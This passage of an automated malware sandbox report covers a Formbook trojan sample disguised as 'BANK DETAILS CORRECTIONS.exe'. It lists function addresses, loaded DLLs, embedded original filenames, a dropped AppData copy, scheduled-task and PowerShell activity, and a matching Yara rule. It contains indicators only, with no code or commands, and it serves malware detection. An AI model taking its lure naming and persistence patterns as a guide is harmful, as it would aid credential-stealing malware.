                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0156600020_2_01566000
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015A02C020_2_015A02C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152053520_2_01520535
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0154475020_2_01544750
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152077020_2_01520770
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151C7C020_2_0151C7C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153C6E020_2_0153C6E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153696220_2_01536962
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015229A020_2_015229A0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152A84020_2_0152A840
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152284020_2_01522840
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0154E8F020_2_0154E8F0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155889020_2_01558890
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015068B820_2_015068B8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151EA8020_2_0151EA80
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152ED7A20_2_0152ED7A
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152AD0020_2_0152AD00
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01528DC020_2_01528DC0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151ADE020_2_0151ADE0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01538DBF20_2_01538DBF
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01520C0020_2_01520C00
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01510CF220_2_01510CF2
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01594F4020_2_01594F40
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01540F3020_2_01540F30
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01562F2820_2_01562F28
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01512FC820_2_01512FC8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0159EFA020_2_0159EFA0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01520E5920_2_01520E59
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01532E9020_2_01532E90
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0150F17220_2_0150F172
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155516C20_2_0155516C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152B1B020_2_0152B1B0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0150D34C20_2_0150D34C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015233F320_2_015233F3
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153B2C020_2_0153B2C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153D2F020_2_0153D2F0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015252A020_2_015252A0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151146020_2_01511460
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015674E020_2_015674E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152349720_2_01523497
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152B73020_2_0152B730
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152995020_2_01529950
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153B95020_2_0153B950
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152599020_2_01525990
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0158D80020_2_0158D800
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015238E020_2_015238E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01595BF020_2_01595BF0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155DBF920_2_0155DBF9
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153FB8020_2_0153FB80
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01593A6C20_2_01593A6C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01523D4020_2_01523D40
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153FDC020_2_0153FDC0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01599C3220_2_01599C32
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01539C2020_2_01539C20
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01521F9220_2_01521F92
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01529EB020_2_01529EB0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: String function: 01567E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: String function: 0158EA12 appears 36 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 01965130 appears 58 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 019AF290 appears 105 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 01977E54 appears 100 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 0199EA12 appears 86 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 0191B970 appears 283 times
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1296298907.0000000004080000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1304078204.0000000007F50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000000.1248838947.00000000009EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.000000000755E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1294018574.000000000107E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdiagnhost.exej% vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.0000000001A1D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: rasadhlp.dll
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                The rule above matched in each of the following sources:
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fcLfLlfpmjf.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, fe1LJPaDf5VFXiQOsV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
